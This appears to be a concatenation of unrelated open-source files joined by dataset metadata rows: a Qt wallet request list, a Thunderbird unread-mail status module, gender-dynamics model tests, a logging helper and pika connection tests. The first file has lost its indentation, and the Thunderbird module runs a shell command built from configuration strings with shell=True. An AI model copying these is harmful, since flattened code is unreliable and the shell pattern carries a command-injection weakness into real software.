# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from electroncash.address import Address
from electroncash.i18n import _
from electroncash.util import format_time, age
from electroncash.plugins import run_hook
from electroncash.paymentrequest import pr_tooltips, PR_UNKNOWN
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import QTreeWidgetItem, QMenu
from .util import MyTreeWidget, pr_icons
class RequestList(MyTreeWidget):
    filter_columns = [0, 1, 2, 3, 4] # Date, Address, Signature, Description, Amount
def __init__(self, parent):
MyTreeWidget.__init__(self, parent, self.create_menu, [_('Date'), _('Address'), '', _('Description'), _('Amount'), _('Status')], 3, deferred_updates=False)
self.currentItemChanged.connect(self.item_changed)
self.itemClicked.connect(self.item_changed)
self.setSortingEnabled(True)
self.setColumnWidth(0, 180)
self.hideColumn(1)
self.wallet = parent.wallet
def item_changed(self, item):
if item is None:
return
if not item.isSelected():
return
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests.get(addr)
if not req:
return
expires = age(req['time'] + req['exp']) if req.get('exp') else _('Never')
amount = req['amount']
opr = req.get('op_return') or req.get('op_return_raw')
opr_is_raw = bool(req.get('op_return_raw'))
message = self.wallet.labels.get(addr.to_storage_string(), '')
self.parent.receive_address = addr
self.parent.receive_address_e.setText(addr.to_full_ui_string())
self.parent.receive_message_e.setText(message)
self.parent.receive_amount_e.setAmount(amount)
self.parent.expires_combo.hide()
self.parent.expires_label.show()
self.parent.expires_label.setText(expires)
self.parent.receive_opreturn_rawhex_cb.setChecked(opr_is_raw)
self.parent.receive_opreturn_e.setText(opr or '')
self.parent.save_request_button.setEnabled(False)
self.parent.cash_account_e.set_cash_acct()
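    # Selecting a request row repopulates the receive-tab form from the stored
    # request: address, description, amount, OP_RETURN payload (raw or not) and
    # the expiry label, so the request can be reviewed or saved again.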
def select_item_by_address(self, address):
self.setCurrentItem(None)
for i in range(self.topLevelItemCount()):
item = self.topLevelItem(i)
if item and item.data(0, Qt.UserRole) == address:
self.setCurrentItem(item)
return
def on_edited(self, item, column, prior):
'''Called only when the text in the memo field actually changes.
Updates the UI and re-saves the request. '''
super().on_edited(item, column, prior)
self.setCurrentItem(item)
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests.get(addr)
if req:
self.parent.save_payment_request()
def chkVisible(self):
# hide receive tab if no receive requests available
b = len(self.wallet.receive_requests) > 0 and self.parent.isVisible()
self.setVisible(b)
self.parent.receive_requests_label.setVisible(b)
if not b:
self.parent.expires_label.hide()
self.parent.expires_combo.show()
def on_update(self):
self.chkVisible()
# update the receive address if necessary
current_address_string = self.parent.receive_address_e.text().strip()
current_address = Address.from_string(current_address_string) if len(current_address_string) else None
domain = self.wallet.get_receiving_addresses()
addr = self.wallet.get_unused_address()
if current_address not in domain and addr:
self.parent.set_receive_address(addr)
# clear the list and fill it again
item = self.currentItem()
prev_sel = item.data(0, Qt.UserRole) if item else None
self.clear()
for req in self.wallet.get_sorted_requests(self.config):
address = req['address']
if address not in domain:
continue
timestamp = req.get('time', 0)
amount = req.get('amount')
expiration = req.get('exp', None)
message = req.get('memo', '')
date = format_time(timestamp)
status = req.get('status')
signature = req.get('sig')
requestor = req.get('name', '')
amount_str = self.parent.format_amount(amount) if amount else ""
item = QTreeWidgetItem([date, address.to_ui_string(), '', message,
amount_str, _(pr_tooltips.get(status,''))])
item.setData(0, Qt.UserRole, address)
if signature is not None:
item.setIcon(2, QIcon(":icons/seal.svg"))
item.setToolTip(2, 'signed by '+ requestor)
            if status != PR_UNKNOWN:
item.setIcon(6, QIcon(pr_icons.get(status)))
self.addTopLevelItem(item)
if prev_sel == address:
self.setCurrentItem(item)
def create_menu(self, position):
item = self.itemAt(position)
if not item:
return
self.setCurrentItem(item) # sometimes it's not the current item.
addr = item.data(0, Qt.UserRole)
req = self.wallet.receive_requests[addr]
column = self.currentColumn()
column_title = self.headerItem().text(column)
column_data = item.text(column)
menu = QMenu(self)
menu.addAction(_("Copy {}").format(column_title), lambda: self.parent.app.clipboard().setText(column_data.strip()))
menu.addAction(_("Copy URI"), lambda: self.parent.view_and_paste('URI', '', self.parent.get_request_URI(addr)))
menu.addAction(_("Save as BIP70 file"), lambda: self.parent.export_payment_request(addr))
menu.addAction(_("Delete"), lambda: self.parent.delete_payment_request(addr))
run_hook('receive_list_menu', menu, addr)
menu.exec_(self.viewport().mapToGlobal(position))
| mit | -1,929,781,626,192,813,300 | 43.761006 | 163 | 0.642968 | false |
tobi-wan-kenobi/bumblebee-status | bumblebee_status/modules/contrib/thunderbird.py | 1 | 2547 | # pylint: disable=C0111,R0903
"""
Displays the unread email count for one or more Thunderbird inboxes
Parameters:
* thunderbird.home: Absolute path of your .thunderbird directory (e.g.: /home/pi/.thunderbird)
* thunderbird.inboxes: Comma separated values for all MSF inboxes and their parent directory (account) (e.g.: imap.gmail.com/INBOX.msf,outlook.office365.com/Work.msf)
Tips:
* You can run the following command in order to list all your Thunderbird inboxes
find ~/.thunderbird -name '*.msf' | awk -F '/' '{print $(NF-1)"/"$(NF)}'
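Example invocation (illustrative only; the exact `-p key=value` syntax may vary
between bumblebee-status versions, and the paths below are placeholders):
    bumblebee-status -m thunderbird -p thunderbird.home=/home/pi/.thunderbird thunderbird.inboxes=imap.gmail.com/INBOX.msf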
contributed by `cristianmiranda <https://github.com/cristianmiranda>`_ - many thanks!
"""
import core.module
import core.widget
import core.decorators
import core.input
import util.cli
class Module(core.module.Module):
@core.decorators.every(minutes=1)
def __init__(self, config, theme):
super().__init__(config, theme, core.widget.Widget(self.thunderbird))
self.__total = 0
self.__label = ""
self.__inboxes = []
self.__home = self.parameter("home", "")
inboxes = self.parameter("inboxes", "")
if inboxes:
self.__inboxes = util.format.aslist(inboxes)
def thunderbird(self, _):
return str(self.__label)
def update(self):
try:
self.__total = 0
self.__label = ""
stream = self.__getThunderbirdStream()
unread = self.__getUnreadMessagesByInbox(stream)
counts = []
for inbox in self.__inboxes:
count = unread[inbox]
self.__total += int(count)
counts.append(count)
self.__label = "/".join(counts)
except Exception as err:
self.__label = err
def __getThunderbirdStream(self):
cmd = (
"find "
+ self.__home
+ " -name '*.msf' -exec grep -REo 'A2=[0-9]' {} + | grep"
)
for inbox in self.__inboxes:
cmd += " -e {}".format(inbox)
cmd += "| awk -F / '{print $(NF-1)\"/\"$(NF)}'"
return util.cli.execute(cmd, shell=True).strip().split("\n")
def __getUnreadMessagesByInbox(self, stream):
unread = {}
for line in stream:
entry = line.split(":A2=")
inbox = entry[0]
count = entry[1]
unread[inbox] = count
return unread
def state(self, widget):
if self.__total > 0:
return ["warning"]
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| mit | -1,776,329,110,352,044,500 | 27.617978 | 170 | 0.566549 | false |
00krishna-research/py_university_gender_dynamics_pkg | tests/test_pyugend.py | 1 | 8479 | import pytest
from models.Models import Base_model
from models.Basic_stochastic_model import Basic_stochastic_model
from models.Stochastic_model_with_promotion import Stochastic_model_with_promotion
from models.Replication_model import Replication_model
from models.Stochastic_model_with_promotion_and_first_hiring import Stochastic_model_with_promotion_and_first_hiring
from comparisons.Comparison import Comparison
from models.Basic_stochastic_model_fixed_promotion import Basic_stochastic_model_fixed_promotion
import numpy as np
import pandas as pd
@pytest.fixture
def mock_data():
return ({'number_of_females_1': 14,
'number_of_females_2': 3,
'number_of_females_3': 19,
'number_of_males_1': 37,
'number_of_males_2': 28,
'number_of_males_3': 239,
'number_of_initial_vacancies_1': 5.303,
'number_of_initial_vacancies_2': 5.9,
'number_of_initial_vacancies_3': 8.31,
'hiring_rate_women_1': 0.310,
'hiring_rate_women_2': 0.222,
'hiring_rate_women_3': 0,
'attrition_rate_women_1': 0,
'attrition_rate_women_2': 0,
'attrition_rate_women_3': 0.017,
'attrition_rate_men_1': 0.009,
'attrition_rate_men_2': 0.017,
'attrition_rate_men_3': 0.033,
'probablity_of_outside_hire_1': 1,
'probability_of_outside_hire_2': 0.158,
'probability_of_outside_hire_3': 0.339,
'female_promotion_probability_1': 0.122,
'female_promotion_probability_2': 0.188,
'male_promotion_probability_1': 0.19,
'male_promotion_probability_2': 0.19,
'max_threshold': 0.1,
'prob_random_growth': 0.1,
'duration': 40})
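# The fixture above sketches a three-rank department (levels 1-3, presumably
# assistant/associate/full): head counts of women and men per level, initial
# vacancies, hiring/attrition/promotion rates, growth bounds and run duration.
# The keys mirror the keyword arguments expected by the model constructors.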
def test_Base_model(mock_data):
assert isinstance(Base_model(**mock_data), Base_model)
def test_base_model_run(mock_data):
t = Base_model(**mock_data)
t.run_model()
assert (isinstance(t.res, np.ndarray))
def test_base_model_persistence(mock_data):
t = Base_model(**mock_data)
assert (t.nf1 == 14)
def test_base_model_multiple_runs(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (isinstance(t.run_multiple(10), int))
def test_base_model_multiple_runs_persistent_state(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_multiple(10)
assert (isinstance(t.mean_matrix, np.ndarray))
def test_base_model_parameter_sweep(mock_data):
t = Stochastic_model_with_promotion(**mock_data)
v = t.run_parameter_sweep(12, 'female_pp_1', 0.1, 0.3, 2)
assert (isinstance(v, int))
def test_base_model_plot_multiple_runs(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_multiple(10)
t.plot_multiple_runs_detail()
#
# def test_base_model_multiple_runs_gender_prop(mock_data):
# t = Basic_stochastic_model(**mock_data)
# t.run_multiple(10)
# t.plot_multiple_runs_gender_prop()
def test_basic_stochastic_model(mock_data):
assert (isinstance(Basic_stochastic_model(**mock_data),
Basic_stochastic_model))
def test_basic_stochastic_model_run(mock_data):
t = Basic_stochastic_model(**mock_data).run_model()
assert isinstance(t, np.recarray)
def test_basic_stochastic_model_run_with_saved_data(mock_data):
t = Basic_stochastic_model(**mock_data)
t.run_model()
assert isinstance(t.run, np.recarray)
def test_basic_stochastic_model_promotion_probability_recovery(mock_data):
t = Basic_stochastic_model(**mock_data)
assert (t.female_promotion_probability_2 == 0.188)
def test_replication_model(mock_data):
t = Replication_model(**mock_data)
t.run_model()
assert (isinstance(t.run, np.ndarray))
# def test_base_model_multiple_runs_gender_prop(mock_data):
# t = Replication_model(**mock_data)
# t.run_multiple(10)
# t.plot_multiple_runs_gender_prop()
# def test_excel_export(mock_data):
# t = Basic_stochastic_model(**mock_data)
# t.export_model_run()
# assert(isinstance(t,Basic_stochastic_model))
def test_stochastic_model_with_hiring_first(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_model()
assert (isinstance(t.run, np.ndarray))
def test_stochastic_model_with_hiring_first_multiple(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_multiple(10)
assert (isinstance(t.mean_matrix, np.ndarray))
def test_comparison_model_plot_detail(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_comparison_detail(10)
def test_comparison_model_param_sweep(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_parameter_sweep_gender_proportion(10, 'female_promotion_probability_2', 0.1, 0.5, 8)
def test_comparison_model_param_sweep_detail(mock_data):
modlist = list([Replication_model(**mock_data),
Basic_stochastic_model(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_parameter_sweep_detail(10, 'female_promotion_probability_2', 0.1, 0.5, 8)
def test_base_model_probability_calc_detail_array(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
res = t.run_probability_analysis_parameter_sweep_gender_detail(10,
'female_promotion_probability_2',
'm2', 0.1, 0.8, 8, 150)
print(res)
assert (isinstance(res, pd.DataFrame))
# def test_base_model_probability_calc_plot(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_empirical_probability_group_detail(10,
# 'female_promotion_probability_2',
# 'm2', 0.1, 0.8, 8, 150)
#
# def test_comparison_empirical_probability_detail_plot(mock_data):
# modlist = list([Replication_model(**mock_data),
# Basic_stochastic_model(**mock_data),
# Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
# c = Comparison(modlist)
# c.plot_comparison_empirical_probability_detail(10,
# 'female_promotion_probability_2',
# 'm2', 0.1, 0.8, 20, 150)
# def test_plot_dept_size_over_time(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_department_size_over_time_multiple_runs(10)
# def test_plot_comparision_department_size(mock_data):
# modlist = list([Basic_stochastic_model_fixed_promotion(**mock_data),
# Basic_stochastic_model(**mock_data),
# Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
# c = Comparison(modlist)
# c.plot_comparison_department_size()
def test_multiple_runs_created_res_array(mock_data):
t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
t.run_multiple(10)
assert hasattr(t, 'probability_matrix')
#
# def test_plot_empirical_probability_gender_proportion(mock_data):
# t = Stochastic_model_with_promotion_and_first_hiring(**mock_data)
# t.plot_empirical_probability_gender_proportion(100, 0.19)
def test_plot_comparision_empirical_probability_gender_proportion(mock_data):
modlist = list([Basic_stochastic_model(**mock_data),
Basic_stochastic_model_fixed_promotion(**mock_data),
Stochastic_model_with_promotion_and_first_hiring(**mock_data)])
c = Comparison(modlist)
c.plot_comparison_empirical_probability_gender_proportion(100, 0.19)
def test_basic_stochastic_with_random_dept_growth(mock_data):
t = Basic_stochastic_model(**mock_data)
    assert t.max_threshold == 0.1 | mit | -7,201,322,699,936,751,000 | 36.522124 | 116 | 0.638047 | false |
conda/kapsel | conda_kapsel/verbose.py | 1 | 1279 | # -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Copyright © 2016, Continuum Analytics, Inc. All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
# ----------------------------------------------------------------------------
"""Control verbose output."""
from __future__ import absolute_import
import logging
_verbose_loggers = []
def push_verbose_logger(logger):
"""Push a logger to log verbose messgaes."""
global _verbose_loggers
_verbose_loggers.append(logger)
def pop_verbose_logger():
"""Remove the most recently-pushed verbose logger."""
global _verbose_loggers
assert len(_verbose_loggers) > 0
_verbose_loggers.pop()
_cached_null_logger = None
def _null_logger():
global _cached_null_logger
if _cached_null_logger is None:
logger = logging.getLogger(name='conda_kapsel_null')
logger.addHandler(logging.NullHandler())
_cached_null_logger = logger
return _cached_null_logger
def _verbose_logger():
"""Used internal to conda-kapsel library to get the current verbose logger."""
if len(_verbose_loggers) > 0:
return _verbose_loggers[-1]
else:
return _null_logger()
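# Usage sketch (illustrative only): library code obtains the current logger via
# _verbose_logger(), while an embedding application can temporarily route
# verbose output to its own logger, e.g.:
#
#     logger = logging.getLogger('my_app.verbose')  # hypothetical logger name
#     push_verbose_logger(logger)
#     try:
#         ...  # call conda-kapsel APIs; their verbose messages go to `logger`
#     finally:
#         pop_verbose_logger()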
| bsd-3-clause | -7,881,255,207,816,083,000 | 27.4 | 82 | 0.593114 | false |
pika/pika | tests/unit/connection_tests.py | 1 | 41689 | """
Tests for pika.connection.Connection
"""
# Suppress pylint warnings concerning access to protected member
# pylint: disable=W0212
# Suppress pylint messages concerning missing docstrings
# pylint: disable=C0111
# Suppress pylint messages concerning invalid method name
# pylint: disable=C0103
try:
import mock
except ImportError:
from unittest import mock # pylint: disable=E0611
import random
import platform
import unittest
import mock
from pika import connection, channel, credentials, exceptions, frame, spec
import pika
from pika.compat import xrange
def dummy_callback():
"""Callback method to use in tests"""
pass
class ConstructibleConnection(connection.Connection):
"""Adds dummy overrides for `Connection`'s abstract methods so
that we can instantiate and test it.
"""
def _adapter_connect_stream(self):
raise NotImplementedError
def _adapter_disconnect_stream(self):
raise NotImplementedError
def _adapter_call_later(self, delay, callback):
raise NotImplementedError
def _adapter_remove_timeout(self, timeout_id):
raise NotImplementedError
def _adapter_add_callback_threadsafe(self, callback):
raise NotImplementedError
def _adapter_emit_data(self, data):
raise NotImplementedError
class ConnectionTests(unittest.TestCase): # pylint: disable=R0904
def setUp(self):
class ChannelTemplate(channel.Channel):
channel_number = None
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
self.connection = ConstructibleConnection()
self.connection._set_connection_state(
connection.Connection.CONNECTION_OPEN)
self.connection._opened = True
self.channel = mock.Mock(spec=ChannelTemplate)
self.channel.channel_number = 1
self.channel.is_open = True
self.channel.is_closing = False
self.channel.is_closed = False
self.connection._channels[self.channel.channel_number] = self.channel
def tearDown(self):
del self.connection
del self.channel
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_calls_on_close_ready_when_no_channels(
self, on_close_ready_mock):
self.connection._channels = dict()
self.connection.close()
self.assertTrue(on_close_ready_mock.called,
'on_close_ready_mock should have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_closes_open_channels(self, on_close_ready):
self.connection.close()
self.channel.close.assert_called_once_with(200, 'Normal shutdown')
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_closes_opening_channels(self, on_close_ready):
self.channel.is_open = False
self.channel.is_closing = False
self.channel.is_closed = False
self.connection.close()
self.channel.close.assert_called_once_with(200, 'Normal shutdown')
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_close_does_not_close_closing_channels(self, on_close_ready):
self.channel.is_open = False
self.channel.is_closing = True
self.channel.is_closed = False
self.connection.close()
self.assertFalse(self.channel.close.called)
self.assertFalse(on_close_ready.called)
@mock.patch('pika.connection.Connection._close_channels')
def test_close_raises_wrong_state_when_already_closed_or_closing(
self, close_channels):
for closed_state in (self.connection.CONNECTION_CLOSED,
self.connection.CONNECTION_CLOSING):
self.connection.connection_state = closed_state
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.close()
self.assertEqual(self.channel.close.call_count, 0)
self.assertEqual(self.connection.connection_state, closed_state)
@mock.patch('logging.Logger.critical')
def test_deliver_frame_to_channel_with_frame_for_unknown_channel(
self, critical_mock):
unknown_channel_num = 99
self.assertNotIn(unknown_channel_num, self.connection._channels)
unexpected_frame = frame.Method(unknown_channel_num, mock.Mock())
self.connection._deliver_frame_to_channel(unexpected_frame)
critical_mock.assert_called_once_with(
'Received %s frame for unregistered channel %i on %s',
unexpected_frame.NAME, unknown_channel_num, self.connection)
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_with_closing_channels(self, on_close_ready):
"""if connection is closing but closing channels remain, do not call \
_on_close_ready
"""
self.channel.is_open = False
self.channel.is_closing = True
self.channel.is_closed = False
self.connection.close()
self.assertFalse(on_close_ready.called,
'_on_close_ready should not have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_closing_state_last_channel_calls_on_close_ready(
self, on_close_ready_mock):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
self.connection._on_channel_cleanup(self.channel)
self.assertTrue(on_close_ready_mock.called,
'_on_close_ready should have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_closing_state_more_channels_no_on_close_ready(
self, on_close_ready_mock):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
channel_mock = mock.Mock(channel_number=99, is_closing=True)
self.connection._channels[99] = channel_mock
self.connection._on_channel_cleanup(self.channel)
self.assertFalse(on_close_ready_mock.called,
'_on_close_ready should not have been called')
@mock.patch('pika.connection.Connection._on_close_ready')
def test_on_channel_cleanup_non_closing_state(self, on_close_ready):
"""if connection isn't closing _on_close_ready should not be called"""
self.connection._on_channel_cleanup(mock.Mock())
self.assertFalse(on_close_ready.called,
'_on_close_ready should not have been called')
def test_on_stream_terminated_cleans_up(self):
"""_on_stream_terminated cleans up heartbeat, adapter, and channels"""
heartbeat = mock.Mock()
self.connection._heartbeat_checker = heartbeat
self.connection._adapter_disconnect_stream = mock.Mock()
original_exc = Exception('something terrible')
self.connection._on_stream_terminated(original_exc)
heartbeat.stop.assert_called_once_with()
self.channel._on_close_meta.assert_called_once_with(original_exc)
self.assertTrue(self.connection.is_closed)
def test_on_stream_terminated_invokes_connection_closed_callback(self):
"""_on_stream_terminated invokes `Connection.ON_CONNECTION_CLOSED` callbacks"""
self.connection.callbacks.process = mock.Mock(
wraps=self.connection.callbacks.process)
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._on_stream_terminated(Exception(1, 'error text'))
self.connection.callbacks.process.assert_called_once_with(
0, self.connection.ON_CONNECTION_CLOSED, self.connection,
self.connection, mock.ANY)
with self.assertRaises(AssertionError):
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
def test_on_stream_terminated_invokes_protocol_on_connection_error_and_closed(
self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`IncompatibleProtocolError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_PROTOCOL)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(type(conn_exc), exceptions.IncompatibleProtocolError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
def test_on_stream_terminated_invokes_auth_on_connection_error_and_closed(self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`ProbableAuthenticationError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_START)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(
type(conn_exc), exceptions.ProbableAuthenticationError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
def test_on_stream_terminated_invokes_access_denied_on_connection_error_and_closed(
self):
"""_on_stream_terminated invokes `ON_CONNECTION_ERROR` with \
`ProbableAccessDeniedError` and `ON_CONNECTION_CLOSED` callbacks"""
with mock.patch.object(self.connection.callbacks, 'process'):
self.connection._adapter_disconnect_stream = mock.Mock()
self.connection._set_connection_state(
self.connection.CONNECTION_TUNE)
self.connection._opened = False
original_exc = exceptions.StreamLostError(1, 'error text')
self.connection._on_stream_terminated(original_exc)
self.assertEqual(self.connection.callbacks.process.call_count, 1)
self.connection.callbacks.process.assert_any_call(
0, self.connection.ON_CONNECTION_ERROR, self.connection,
self.connection, mock.ANY)
conn_exc = self.connection.callbacks.process.call_args_list[0][0][
4]
self.assertIs(type(conn_exc), exceptions.ProbableAccessDeniedError)
self.assertSequenceEqual(conn_exc.args, [repr(original_exc)])
@mock.patch('pika.connection.Connection._adapter_connect_stream')
def test_new_conn_should_use_first_channel(self, connect):
"""_next_channel_number in new conn should always be 1"""
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection()
self.assertEqual(1, conn._next_channel_number())
def test_next_channel_number_returns_lowest_unused(self):
"""_next_channel_number must return lowest available channel number"""
for channel_num in xrange(1, 50):
self.connection._channels[channel_num] = True
expectation = random.randint(5, 49)
del self.connection._channels[expectation]
self.assertEqual(self.connection._next_channel_number(), expectation)
def test_add_callbacks(self):
"""make sure the callback adding works"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
for test_method, expected_key in (
(self.connection.add_on_open_callback,
self.connection.ON_CONNECTION_OPEN_OK),
(self.connection.add_on_close_callback,
self.connection.ON_CONNECTION_CLOSED)):
self.connection.callbacks.reset_mock()
test_method(dummy_callback)
self.connection.callbacks.add.assert_called_once_with(
0, expected_key, dummy_callback, False)
def test_add_on_close_callback(self):
"""make sure the add on close callback is added"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
self.connection.add_on_open_callback(dummy_callback)
self.connection.callbacks.add.assert_called_once_with(
0, self.connection.ON_CONNECTION_OPEN_OK, dummy_callback, False)
def test_add_on_open_error_callback(self):
"""make sure the add on open error callback is added"""
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
#Test with remove default first (also checks default is True)
self.connection.add_on_open_error_callback(dummy_callback)
self.connection.callbacks.remove.assert_called_once_with(
0, self.connection.ON_CONNECTION_ERROR,
self.connection._default_on_connection_error)
self.connection.callbacks.add.assert_called_once_with(
0, self.connection.ON_CONNECTION_ERROR, dummy_callback, False)
def test_channel(self):
"""test the channel method"""
self.connection._next_channel_number = mock.Mock(return_value=42)
test_channel = mock.Mock(spec=channel.Channel)
self.connection._create_channel = mock.Mock(return_value=test_channel)
self.connection._add_channel_callbacks = mock.Mock()
ret_channel = self.connection.channel(on_open_callback=dummy_callback)
self.assertEqual(test_channel, ret_channel)
self.connection._create_channel.assert_called_once_with(
42, dummy_callback)
self.connection._add_channel_callbacks.assert_called_once_with(42)
test_channel.open.assert_called_once_with()
def test_channel_on_closed_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_CLOSED
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_closing_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_CLOSING
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_init_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_INIT
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_start_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_START
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_protocol_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_PROTOCOL
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_channel_on_tune_connection_raises_connection_closed(self):
self.connection.connection_state = self.connection.CONNECTION_TUNE
with self.assertRaises(exceptions.ConnectionWrongStateError):
self.connection.channel(on_open_callback=lambda *args: None)
def test_connect_no_adapter_connect_from_constructor_with_external_workflow(self):
"""check that adapter connection is not happening in constructor with external connection workflow."""
with mock.patch.object(
ConstructibleConnection,
'_adapter_connect_stream') as adapter_connect_stack_mock:
conn = ConstructibleConnection(internal_connection_workflow=False)
self.assertFalse(adapter_connect_stack_mock.called)
self.assertEqual(conn.connection_state, conn.CONNECTION_INIT)
def test_client_properties(self):
"""make sure client properties has some important keys"""
client_props = self.connection._client_properties
self.assertTrue(isinstance(client_props, dict))
for required_key in ('product', 'platform', 'capabilities',
'information', 'version'):
self.assertTrue(required_key in client_props,
'%s missing' % required_key)
def test_client_properties_default(self):
expectation = {
'product': connection.PRODUCT,
'platform': 'Python %s' % platform.python_version(),
'capabilities': {
'authentication_failure_close': True,
'basic.nack': True,
'connection.blocked': True,
'consumer_cancel_notify': True,
'publisher_confirms': True
},
'information': 'See http://pika.rtfd.org',
'version': pika.__version__
}
self.assertDictEqual(self.connection._client_properties, expectation)
def test_client_properties_override(self):
expectation = {
'capabilities': {
'authentication_failure_close': True,
'basic.nack': True,
'connection.blocked': True,
'consumer_cancel_notify': True,
'publisher_confirms': True
}
}
override = {
'product': 'My Product',
'platform': 'Your platform',
'version': '0.1',
'information': 'this is my app'
}
expectation.update(override)
params = connection.ConnectionParameters(client_properties=override)
with mock.patch.object(ConstructibleConnection,
'_adapter_connect_stream'):
conn = ConstructibleConnection(params)
self.assertDictEqual(conn._client_properties, expectation)
def test_close_channels(self):
"""test closing all channels"""
self.connection.connection_state = self.connection.CONNECTION_OPEN
self.connection.callbacks = mock.Mock(spec=self.connection.callbacks)
opening_channel = mock.Mock(
is_open=False, is_closed=False, is_closing=False)
open_channel = mock.Mock(
is_open=True, is_closed=False, is_closing=False)
closing_channel = mock.Mock(
is_open=False, is_closed=False, is_closing=True)
self.connection._channels = {
'openingc': opening_channel,
'openc': open_channel,
'closingc': closing_channel
}
self.connection._close_channels(400, 'reply text')
opening_channel.close.assert_called_once_with(400, 'reply text')
open_channel.close.assert_called_once_with(400, 'reply text')
self.assertFalse(closing_channel.close.called)
self.assertTrue('openingc' in self.connection._channels)
self.assertTrue('openc' in self.connection._channels)
self.assertTrue('closingc' in self.connection._channels)
self.assertFalse(self.connection.callbacks.cleanup.called)
